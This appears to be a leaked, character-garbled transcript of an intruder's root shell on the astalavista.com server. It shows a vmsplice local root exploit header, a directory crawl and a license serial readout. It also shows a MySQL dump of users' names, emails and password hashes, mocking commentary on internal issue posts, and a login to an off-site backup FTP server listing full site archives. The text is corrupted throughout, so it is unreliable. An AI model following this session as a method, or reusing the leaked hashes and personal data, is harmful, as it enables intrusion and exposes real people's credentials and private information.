( }0 I1 N! `7 a6 Y8 Y. pdrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system7 Q% {0 z( J" { x$ w& G+ h# U
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history7 t+ O$ H% T! {8 J' G2 a2 T
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout& t# W3 a/ q- O8 n+ X$ B' \
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile- j5 n* _- ]4 n: y3 s
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
) P$ K/ o. ]2 R$ x( vdrwx–x–x 3 com com 4096 Jan 29 2008 domains
. D2 {# A) O; s0 i& p0 E2 Y3 ?+ k! }-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed$ r1 A0 r" H' ~& j# z7 i9 K: H) q/ i
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap! W6 ^) n8 z* u
-rw——- 1 com com 69 Nov 18 2008 .lesshst' Y# M" [# |6 h& Y
drwx—— 2 com com 4096 Sep 24 2007 mail
! T) z, d( I% u. `-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
* j& g) Y4 ^ P' S Mdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
- t1 i6 [7 n( D; q. ^3 W8 slrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
) _7 w& }/ C8 \ w& |-rw-r—– 1 com mail 34 Sep 24 2007 .shadow- g7 ^- a0 H# O
drwx—— 2 com com 4096 Aug 26 2008 .ssh
5 n4 f9 n; E3 ^6 {; I: s' A-rwx—— 1 com com 8515 Feb 10 2008 t l3 _$ ^- C* |( e* C
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
$ f4 Z" | t: A. }' Ldrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
+ P O% B6 R! m/ \-rw-rw-r– 1 com com 617 May 20 2008 .toprc
! N! _+ l1 X3 ?( M1 P-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql2 E1 E8 ~) {+ `# W. G: c4 B2 H. E
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo; Q8 T9 e9 l9 [; G3 w _+ n) N! K
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
X! z( a* f2 s) e5 t
) C( C/ y# J) ^( qsh-3.2# head t.c8 h! R. U8 |; t
/*- A5 M8 p- m1 O# Q/ f! i
* jessica_biel_naked_in_my_bed.c7 b/ F& z- n0 n4 U7 ?; V9 O* O" i
*: C# f9 I Q/ b5 y) W* W! @8 w
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
" H6 I; y) x2 Y, K* E* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.0 S" s( _6 H% I7 G: q
* Stejnak je to stare jak cyp a aj jakesyk rozbite.$ u. G" p: f: t' Y
*6 Y4 T# O7 O* k0 ^% [# n" W' \$ t( H
* Linux vmsplice Local Root Exploit" L7 x; n! \& ~" y6 g( Y
* By qaaz
! j3 p$ I) V, _! i*7 f6 }: [" Y- e( \( b2 o
( w9 L- E8 i# ] D8 y
sh-3.2# cd /! {, ]& j6 x* K$ m. w
sh-3.2# ls -la' w! c9 H" J9 P- \. H @4 v( r8 R
total 360
; g# W: ~/ u( ^drwxr-xr-x 25 root root 4096 Jun 3 02:43 ./ T3 ]9 e% T5 h* Z* B; P
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..( ]8 v6 }3 m0 e1 o( H/ R" M
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group- Q: f5 [, P+ E- G3 o5 D1 o7 I( i
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user+ N# Y8 `/ X+ N% ~; X
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db$ v0 o9 E5 d) b( q T" l% h& W
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
7 {0 K1 P* U8 E( M-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
; R8 V7 j7 \7 X# [drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
' F# @# ` o- L; R q& b; Pdrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
4 f- c: K: V; fdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot# Q- S6 l2 W1 M' {) x! I
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
: N6 ^6 x( o) h8 v& ]drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc0 D5 ]- p7 M" T2 c, H
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
4 a5 T9 j3 z( u) d$ E-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
% ^: W0 {; n% m& `4 h* [drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
: s, H" f& i0 `+ h$ Cdrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
4 F) S0 D/ l7 H3 wdrwx—— 2 root root 16384 Sep 11 2007 lost+found7 @9 l. ^8 W1 X9 _: W
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media3 X/ c# U3 L) i0 A' \
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc3 J( V/ G5 a' Q' h
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt7 ?& j) u. `5 C8 L9 T/ [0 [
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg _8 N! e% R* A0 i; w6 c, l/ c6 `
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
$ y ~& |" X$ ?0 gdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
- T9 o4 g/ H# i2 {, A" Ndr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
8 @$ z2 j* t: Q/ cdrwxr-x— 15 root root 4096 Jun 4 08:40 root
$ ^3 k) A( l; U5 `* xdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
9 w, H- X+ {: e2 B5 o2 Tdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux# C* a" f9 P, ^. W& e' u3 g( E/ `) r
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv, w0 r1 D- t+ _/ C1 c! D
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys, O: |4 z9 {+ |& B5 @5 z
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp: l" [; W% ^( d5 Q {
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr- ~% Q: M: M6 Q4 o4 a8 f+ v
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var( ]* R( O$ z4 E! j$ @0 d' D
: P3 m8 b0 n$ ?1 Q" [sh-3.2# cd opt: Y5 d" m' k" u+ R, C+ Q
sh-3.2# ls -la
3 f6 S1 W. i w, Q8 btotal 204 D- _1 L$ l! n$ V- S0 k
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
9 f- J$ \6 s2 Edrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
e, ?3 a! V) X, _- Q" S1 z2 Qdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws L) a W, |/ v
$ {# s7 I% k n- a k/ tsh-3.2# cd lsws/# g! A5 a7 Q; A: l8 ]
sh-3.2# ls -la6 D0 p8 ^' Z z; z$ U2 `) e
total 1089 o8 e* ]- e/ Y, s% ~
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
* b i' g* [& Ldrwxr-xr-x 3 root root 4096 Mar 11 17:56 .." {' H3 W/ W/ J
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
. U5 P" x% \# l$ U* ]& L& Z" K; Gdrwxr-xr-x 13 root root 4096 May 29 15:10 admin
" H% O/ f; Y4 r# i9 l. D' Pdrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
: F; E% y5 X v6 ddrwxr-xr-x 2 root root 4096 May 29 15:10 bin6 d0 c8 K0 N, N2 W7 {1 A! K0 p
drwx—— 4 apache apache 4096 Jun 3 02:43 conf f7 a5 {1 }. H; k
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT3 Y4 _$ c" s2 E/ L0 x& f" Q
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs5 Y% {& U( E+ S2 d) D k
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin3 A& p3 I: b( S2 ?% @7 ?
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
: w8 \5 j) Q" P. I. j/ `1 [-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE" x- D2 g1 Q% W! P& [5 T6 b+ c
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP: A" n1 M* s0 G e' K+ j, a
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
" h/ m* p4 i9 q# h3 u. h) c-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP3 x- E1 q5 G! `1 x1 U0 g, n
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs6 K/ H3 x. |" w. z# n$ |6 m
drwxr-xr-x 2 root root 4096 Mar 20 2008 php, {2 J' {8 N" F" r8 Y* a3 M
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
; |* I k5 f% |8 _drwxr-xr-x 3 root root 4096 Mar 20 2008 share
3 c4 ?8 D4 L" g: C7 v7 s* ~; L; B-rw-r–r– 1 root root 6 May 29 15:10 VERSION
1 u+ v$ n: l' s6 w" A+ S
$ \6 \2 l) G" A+ f- O& g0 ysh-3.2# cd conf
# z6 e# x3 f/ M3 Hsh-3.2# ls -la
3 I$ \/ A8 s; T" |) m9 B1 l/ Atotal 48
: [' l+ }+ @; x1 ldrwx—— 4 apache apache 4096 Jun 3 02:43 .4 [, n# W/ ^' u @, M) p" b4 c
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..
8 x: o+ S- ]( T7 adrwx—— 2 apache apache 4096 Mar 20 2008 cert
* A( Y. b% @+ w& B. v, V1 |# W-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml% @0 o' X3 h% j" Y; R
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
, t2 I- o: e6 T* v# n: A-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
9 y& a# ?* X, _-rw——- 1 apache apache 256 May 29 15:10 license.key1 _3 l( a- V3 B) I9 k: v% \
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
* \0 @& [+ Y* D) R7 b' ?2 r0 m* L-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
4 f% k. h, ^( v8 [- w0 W-rw——- 1 apache apache 20 May 29 15:10 serial.no
. x& o; q9 v. T4 Xdrwx—— 2 apache apache 4096 Mar 20 2008 templates
9 ?5 a( m+ a$ f- o6 n/ f5 {" l2 U5 N0 ^% j$ u0 ?: D8 B
sh-3.2# cat serial.no
/ L; J5 Z2 b9 EIbDl-oVsO-CKqL-wVRa
$ E! ]; {# { r; i/ |# K5 ^# k5 V
sh-3.2# mysql" W" g3 T! p/ J" s( b5 O9 o; K- K) {
Welcome to the MySQL monitor. Commands end with ; or \g.' P# R1 Z, S0 V# \, v
Your MySQL connection id is 2868445 o5 i( G2 _9 e" I
Server version: 5.0.45-community-log MySQL Community Edition (GPL); r% X' e' ]! ?( q5 U7 y
' }. V/ ^# D% R2 q( B
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.- _' g" j# I0 U5 G" L
f0 v, q& \" i5 E: d8 ?
mysql> show databases;
1 o+ R$ i/ u, v9 Z7 [ U( e+———————–+4 o! g# ~* J o, {# a" @) [
| Database |5 e# R3 C- |3 c4 s- j f
+———————–+$ o. y* z2 u' K
| information_schema | r. ^& v3 P! e- Z9 w/ l9 }
| astanet_ads |( b5 c! f; ~; J. c7 g
| astanet_mailing_lists |. o, U( z9 ?3 q
| astanet_mediawiki |, b6 W7 w7 i: `: S! ^( R. |: Q# A
| astanet_membersystem |2 W2 P5 o# {! U1 y4 i
| com_contrexx |$ q5 d: j5 L, f* _/ C- b
| com_contrexx2 |
. n u6 u9 w/ D9 e| com_contrexx2_live |1 P# X5 K8 e/ Q; [* U! W
| da_roundcube |
+ \- p9 Y" P8 ], W! h n7 L- g| dolphin |
3 h- e; V4 g9 M. }| ideapool |" R: ^; ^4 `* a2 |
| mysql |
5 G7 q& _5 {$ V# J" I| test |
W: j; ^, w1 z% Z5 l| yourmaster |
# ~2 C1 i8 V( g) D4 n+———————–+
3 @! I4 _9 y4 A& o5 C+ d14 rows in set (0.00 sec)
* H( D8 t7 n) g5 @. O2 Q4 y
( T% h% c$ z8 l, D, h, Lmysql> use ideapool5 ?; `1 ~! x2 B/ p" M0 m+ ?
Database changed' z$ A2 S; u) l1 F
mysql> show tables;6 E2 J' f. h0 [0 ^( v2 G
+———————————–+
+ @8 n3 `+ Z, l+ z3 W% p" n| Tables_in_ideapool |
1 s7 w/ M8 `$ r: d# O4 k5 Y- }+———————————–+
5 `: U/ F( ~+ {8 e `: T7 D| eventum_columns_to_display |
% Z1 I& d' `6 z2 X9 M| eventum_custom_field |
2 a) ~% w/ ^: x. y- u; z| eventum_custom_field_option |
! d( | L# r. ?$ v( t/ O| eventum_custom_filter |+ I* G3 D! C% @6 b- G+ H
| eventum_customer_account_manager |% n1 x& r5 }3 l9 W K# T! y0 G4 B
| eventum_customer_note |1 l9 }( H9 @6 g0 R4 M% M6 I5 m C
| eventum_email_account |
1 X: v0 D/ r' Y6 v: x: S| eventum_email_draft |
9 Z J& U' A1 t6 P+ F# I: f2 A| eventum_email_draft_recipient |' A$ k5 E: X( D6 g% E
| eventum_email_response |+ |/ S) I/ x: @, ]0 Z) O o
| eventum_faq |! x8 |6 S+ B g
| eventum_faq_support_level |: G" I' A1 i# K
| eventum_group |8 s8 m0 e1 s4 ^ o, Z, b- M9 U
| eventum_history_type |/ H* u" L8 g" D- I
| eventum_irc_notice |
# y/ Y4 o# Q! ]; W ^* H7 ?. B" k| eventum_issue |5 u6 K9 D7 w4 q4 ?5 e
| eventum_issue_association |7 h2 t# n, s/ D$ `# I& U& r, Z# w7 P
| eventum_issue_attachment |& _4 V ?! k9 l& m
| eventum_issue_attachment_file |: l2 }9 S* g+ d! A
| eventum_issue_checkin |
4 s6 ?! m. P. e2 I' |* h. W| eventum_issue_custom_field |
! r/ W9 z/ {1 q8 e| eventum_issue_history |% c; u# R9 Q$ K' c2 L) M) V: W
| eventum_issue_quarantine |
3 O2 z. J; Z! ~| eventum_issue_requirement |* d2 r/ m3 x8 _+ p( k# |
| eventum_issue_user |
# H* s' V- ]6 U1 p' U# P# @/ p| eventum_issue_user_replier |
( [3 e0 M l, ^| eventum_link_filter |3 Q/ t, O3 Z. K3 t( x7 O
| eventum_mail_queue |3 T. G) i1 E* u& ^; e
| eventum_mail_queue_log |9 l1 N& H4 c7 p* F5 }& _
| eventum_news |
" v) G! W( P! n- Q; N| eventum_note |
+ i" G4 x1 |1 o4 w& b$ k# M| eventum_phone_support |$ y( v0 c+ W" w4 D- k; T
| eventum_project |
$ C9 d( ` q. [! T6 z. r| eventum_project_category |3 v+ r9 f" Q9 K' l$ }; \& v2 A$ T
| eventum_project_custom_field |
5 J5 _7 c r7 ]# r# L$ I| eventum_project_email_response |
; L$ ~# i1 E( C| eventum_project_field_display |
9 d; g# ~, W0 _1 `: N0 H, T$ a8 Z1 Q| eventum_project_group |
, S7 k) W' n( S3 y" b. C| eventum_project_link_filter |
7 l% s9 r2 [" h, c8 n| eventum_project_news |9 y+ D/ n6 l. @7 v
| eventum_project_phone_category |
+ ^* _4 N$ ?! W9 o+ m+ t/ ]| eventum_project_priority |
' j/ q5 q( U. [9 `* E! K| eventum_project_release |
; M3 S1 d; h/ ]& a0 m3 R| eventum_project_round_robin |* F# z1 V) ?4 n: k) D) ]
| eventum_project_status |
9 U. R9 @) N2 K% ]1 T| eventum_project_status_date |
" L' F1 L2 }" C9 v/ G' L( a| eventum_project_user |% F* [: j2 @# w- J8 S
| eventum_reminder_action |
: p; a, n3 L, w' H9 S1 C| eventum_reminder_action_list |
0 e- x8 Q% o9 C+ a: Q| eventum_reminder_action_type |
) A: K% f/ Y2 h% r0 @| eventum_reminder_field |
% m. R" b3 b9 G6 ~: ~1 l; p| eventum_reminder_history |) K: @4 u" G: s- B( a& Y
| eventum_reminder_level |# k, p9 G, r- ?* M
| eventum_reminder_level_condition |
, y) e! c" W2 @( ]( i' e| eventum_reminder_operator |3 b( J* s# D1 N" X' v" j3 P+ ]4 P
| eventum_reminder_priority |0 v' C" X# l: g. g& n2 Z
| eventum_reminder_requirement |
, q' h' J6 L5 l+ Q: O- o5 e4 E| eventum_reminder_triggered_action |3 L' C C4 q1 @
| eventum_resolution |
% L+ @$ t* I" i$ \7 m( M| eventum_round_robin_user |: A! y9 S; X' T; K" X- ?
| eventum_search_profile |
# X0 b" ?* g- q8 S| eventum_status |8 u2 f, R0 U! V) L& @1 q3 o' n
| eventum_subscription |
) O7 m& @- U3 R| eventum_subscription_type |
0 F6 {- ^% E0 l% _2 r| eventum_support_email |
+ F- I1 d2 V! u# {- t. E; Q L; d| eventum_support_email_body |
& K4 q- k- x3 {6 t: I1 @| eventum_time_tracking |
9 B' @1 A4 u( _9 U" F' [% I| eventum_time_tracking_category |
0 h5 k1 `# l0 _! M| eventum_user |, r1 W& T$ _- L5 ~/ _
+———————————–+
; M/ ]( B9 {* ?/ S) d1 C69 rows in set (0.00 sec)1 D7 z. s# R5 ?: G6 P
* F4 R9 a$ F" U6 Y1 Q; ^8 @
mysql> describe eventum_user;
+ }& C+ u2 w6 h) Z9 C1 K+————————-+——————+——+—–+———————+—————-+& r* {2 C+ ^, L Q
| Field | Type | Null | Key | Default | Extra |" e* V2 C' m# t M: D6 C/ I4 p+ R
+————————-+——————+——+—–+———————+—————-+) l! M: j" E4 Z m6 w; ~) v
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
3 ~9 Q; P. m- K+ t' B| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
/ R- w" c3 S5 d- h9 [* y| usr_customer_id | int(11) unsigned | YES | | NULL | |4 { k& i$ `$ _8 a) }9 h% y% q
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
: i0 S7 I8 Z: _9 |% M9 c) T| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |6 c) v( j9 c& B. Z0 d1 j# T
| usr_status | varchar(8) | NO | | active | |
$ M% ? _8 e. h3 {" R. s# }: l| usr_password | varchar(32) | NO | | | |5 l8 U6 b4 [5 p( Z( o
| usr_full_name | varchar(255) | NO | | | |0 w3 @, ^8 P1 \ K+ ~! K/ q
| usr_email | varchar(255) | NO | UNI | | |7 K9 l0 R- t& k3 b& L F& [" E
| usr_preferences | longtext | YES | | NULL | |' B9 ^. _) a& ]) \: J
| usr_sms_email | varchar(255) | YES | | NULL | |# a: N5 i( r9 C6 r3 F, ~) f. U9 M
| usr_clocked_in | tinyint(1) | YES | | 0 | |# q/ x+ g. [: X2 Q0 Q
| usr_lang | varchar(5) | YES | | NULL | |
4 s) G% f1 l; p6 H( r+————————-+——————+——+—–+———————+—————-+
! G( G C. z+ T/ N13 rows in set (0.00 sec), A3 y' n$ a. i. u
7 u5 ]1 j; P+ ^, R* b
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
% I; p( D" @: G* ] z; o: x+ t+———————-+——————————-+———————————-+$ A& i) t& X% ^8 N
| usr_full_name | usr_email | usr_password |1 d9 @, Z* L: I: b5 ?
+———————-+——————————-+———————————-+
( x( i& d4 P% O* K+ F& R+ M| system | 链接标记[email protected] | 14589714398751513457adf349173434 |
! a. m' u+ x5 J| Developer (Paulo) | 链接标记[email protected] | 26a35a1cf8895c27fb37ef4cf149f7bb |
\/ i3 z# M7 q0 r) r| Be1er0ph0r | 链接标记[email protected] | 229766dc0ca1fb67160a8782321dfdce |6 B8 v/ [) x5 N! s8 l& O1 D
| Admin | 链接标记[email protected] | 57c2877c1d84c4b49f3289657deca65c |
0 ]3 t3 S1 G( i, y* y. t& x| ADMIN | 链接标记[email protected] | f6fdffe48c908deb0f4c3bd36c032e72 |
2 ^% a$ s; i9 ~. c4 u6 n) V| USER | 链接标记[email protected] | 5cc32e366c87c4cb49e4309b75f57d64 |% J+ y% U8 I" b+ V
| Glafkos - (nowayout) | 链接标记[email protected] | f7735ab119023a8abb2301e67f81cd67 |! {3 b4 o5 m# K7 {% o; p
| Joao | 链接标记[email protected] | f805c071d7c823b937448c54c047b9fd |
* X: a& `) F- t" z| Pascal | 链接标记[email protected] | e10adc3949ba59abbe56e057f20f883e |
( A' K! B4 Q8 Q# k9 y1 ]& I| commander | 链接标记[email protected] | 932cd250918f881d41feb0b93883a926 |
2 O2 x: M% k% w3 _" X| ishtus | 链接标记[email protected] | a587ffc88b3dbbba3fd2fe67af649ff0 |. }! I, f# X9 {! x8 U
| sykadul | 链接标记[email protected] | 20224a2f3eeb57a13a10b4df543c128e |
/ n. I# C; a/ u& U5 ~# @| Zach McElroy | 链接标记[email protected] | 33c5d4954da881814420f3ba39772644 |
- J3 A2 |# ^( A| usb | 链接标记[email protected] | b513f22c3db6932855ad732f5f8a10a2 |
* B9 t7 [+ J7 @* D8 M| cyph3r | 链接标记[email protected] | 6e1e50017a945e874d52ec91f9ab2cee |( j+ Y8 l# c3 A: Z% V% x. V
+———————-+——————————-+———————————-+/ t ]) z- X; \9 g
15 rows in set (0.00 sec)" D$ \0 Q$ v# D$ m
! \: j+ g) s5 g. L3 m2 {$ }
mysql> select iss_description from eventum_issue where iss_id = 43;
* Q- e- t- p6 Z+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
% q3 K6 C+ u( g( y. g| iss_description
" T% W! y# W b) s4 a. ^4 L& |6 J; C) `3 C|
3 S$ K" A. E4 E; ]+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+- N2 y) B" ^6 Z- `( T
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
w) c& T! p* G( \; Pconnected for 90 mins… 120mins… so what i propose is something like:
7 }9 r4 H, C! `. ^/ v* g: w/ I链接标记[url]http://www.surfthechannel.com/[/url]
; P& V& M9 Z: P- a$ G: ~- F& ssince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system6 s, C, b' I5 j0 _1 f
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t! J% p+ \" ^4 E5 G. P/ v
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off) T4 }8 k2 k" U. k& P
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
) S# k' t1 p( u" J4 l6 |" t2 f3 X% L' e6 r. o4 m1 ?/ V
We could also put advertisement during play on the flash video player itself… extra $$…0 b6 r4 L! X) ?4 L" V
) b4 C# t7 i" L
By sykadul |1 I0 D5 M- k9 J) J; f# ]2 Y, ^( L
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+$ B! t, i- F" f! `( y
1 row in set (0.00 sec)9 Y' r8 v3 `$ O, L5 l5 b
4 X9 F1 v5 E1 Y! H2 ~& X7 H4 o// Money and extra $$ is all they care about. remember that.
7 ^5 }" h: |! t+ H x
, b) d0 Z* T# c9 Z4 `% q+ Gmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
$ c+ V$ V1 N: ?6 D% O, r+————————+——————————————————————————————————————————————————————————————————————————————-+
Q7 ]' O' E' V% @| iss_summary | iss_description " j; Z0 @5 K' q1 U: R: N; t5 B
|! R/ A% ^8 e7 P* E2 p/ b$ }) K
+————————+——————————————————————————————————————————————————————————————————————————————-+# f/ T, |+ i5 M0 j \8 D
| Forum for REAL EXPERTS | Hello,8 n' X4 s! `8 a* e9 x
$ B) _( y7 P& X _, AIshtus and I,
6 m6 W7 r1 D7 F+ ]0 F& J5 V# K
6 h2 V) P* Q' z/ r: d5 eCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide& A& c( v# ^" ]2 ^- {
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
3 c, x& p$ M3 N' m
3 d! }6 ^. ?; ~& SOne example a friend of mine from coresecurity.com!3 z1 P* _4 m+ Z
/ [) ^! N5 B4 e6 Z# s% ~% fWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
+ g7 H5 L( X9 j7 n5 { O- F5 g% w
|
& }- j+ \5 k' C$ z2 h# J+————————+——————————————————————————————————————————————————————————————————————————————+% G# ?! [, j" |; C
1 row in set (0.00 sec)
& c0 S z m0 l, F1 j2 ]
1 I' T! `5 [2 A0 Y; M5 ^// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…8 X6 L( u/ {/ d0 R5 f; @
! R5 Q' ^: t# t6 o# Nmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
6 u8 a, U: X2 c9 c8 _, |, V$ U) R& _+——————+———————————————————————————————+
1 c, |8 C K; U| iss_summary | iss_description |
3 I7 L, C# J* D' C* h+——————+———————————————————————————————+8 b5 H: L% D( v
| Website guidance | Virtual Girl which guides you trought the website.
1 Q% M M) l: i& o' ` e. i
+ Z- v6 l2 t( K3 B/ B: ?We need a girl with who you can ( talk )!!!+ S. O3 S6 B4 U3 m9 p8 \2 L2 T+ I
Also for the News!
5 I7 p! ?4 Q* e3 ~So my suggestion is a girl who read you the news loud if you like!
' t0 }4 N2 l1 T6 d* K! U ryou can choose between read yourselfe or she read it for you or both!6 x! U* r) \7 i) D$ A; Y
5 t' e8 Z# |) U; ]
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
6 w) n3 s6 P7 h- F8 C. h* ~ T' c& q- e9 u
Have a look on the example girls!!
1 i/ G, E* H9 j" @! N; E" M1 E) Y
/ ~" I) ?9 }' r& o7 q链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
f) Q0 F+ V0 q4 |
) i) L: M S3 k$ C3 w* l; `or that6 k! t6 d5 s/ I: a7 Y
! x4 H7 G' Q8 M4 ]/ U链接标记[url]http://www.yellostrom.de/[/url]- ] Z. [# s Q
% U _& T/ A# b
|! t5 c, H6 j2 h3 V4 @; R; c: a
+——————+———————————————————————————————+; T `% ?- l. b/ ` o
1 row in set (0.00 sec)
0 N+ z7 q1 h1 u, Z
`. S- s! _, t& H: R// ha ha.+ S. {3 l9 T! r) }" u
5 B* i( r7 l7 w
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
! ]- s; ^2 m& z ?1 E1 R! ?' I- N0 X+————————–+———————————————————————————————————–+1 ~: {* v! M1 D- Y. H
| iss_summary | iss_description |
: K1 }; ^8 M3 g/ o+————————–+———————————————————————————————————–+- i4 a) J3 {2 x5 ~
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |" B* Q0 L8 L- [* Y. E6 z
+————————–+———————————————————————————————————–+2 A4 b# H% J( \- K: Y- Y; X: R
1 row in set (0.00 sec)4 r# C3 ?8 K5 D+ a" G" |: }( X3 D
6 _& d% k* G( @+ l% g// LOL.1 x5 R. t, \: M$ F
- l2 n: ?4 q0 ^2 amysql> exit' X5 \, R" d* I1 R4 o: L) v
Bye
) Z" x2 ]% ~' W' g6 ^. ^' r0 z, K. m# _/ A1 P; K. m2 B
sh-3.2# ftp 212.254.194.163' N( d, g7 m) b5 t' {0 D. k
Connected to 212.254.194.163.8 C, P W$ H( U' t
220 BackupCOM_VW FTP server ready.' [2 Q+ ^% T& I0 K% m2 q" _
504 AUTH: security mechanism ‘GSSAPI’ not supported.. |' c2 f7 p& f3 s$ }2 L
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.# l% `9 [$ T" N' F' L; T! i: _
KERBEROS_V4 rejected as an authentication type
- g* {; o1 A# GName (212.254.194.163:root): astalavista.com
9 r/ H* Q6 {3 _7 {7 Y: A1 I2 f+ {331 Password required for astalavista.com.
# b) I, v6 K" h: L; j) {& {Password:
- S4 `7 t" S- `* D7 P; g8 G230 User astalavista.com logged in.2 w' _5 j( O* F9 F) v
Remote system type is UNIX.& x; U# p$ n3 q x3 s3 E
Using binary mode to transfer files.
% M/ ?' `% [$ h5 {8 ? l* C% Rftp> ls -la# w) X" M _0 x: `
227 Entering Passive Mode (212,254,194,163,2,188): g# e( q8 f1 q& J5 @4 B ?* W
150 Opening BINARY mode data connection for ‘file list’.: J! q# u5 r. {( V5 F6 M
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
9 i- e% T5 C, z. r226 Transfer complete.4 O5 P( |, u7 u2 [$ `
ftp> cd astalavista.com
4 H B. |, @, c# ? k9 h9 k Z250 CWD command successful.
; X) |8 J7 u9 @ftp> ls -la" @$ i( E$ D9 z* J0 \
227 Entering Passive Mode (212,254,194,163,2,189)
" |6 X+ E% P7 Z$ Q& p5 R; N' K9 G' \* a! t, W150 Opening BINARY mode data connection for ‘file list’.
& r: k2 J/ u. V+ N. z& v9 G5 }-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar& F$ ]$ B1 V' ^5 y: A9 g7 {
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
4 Y" i: \& q a& m0 K8 o) s-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2" {( y8 ~; d' w/ W- ]' t' j3 p
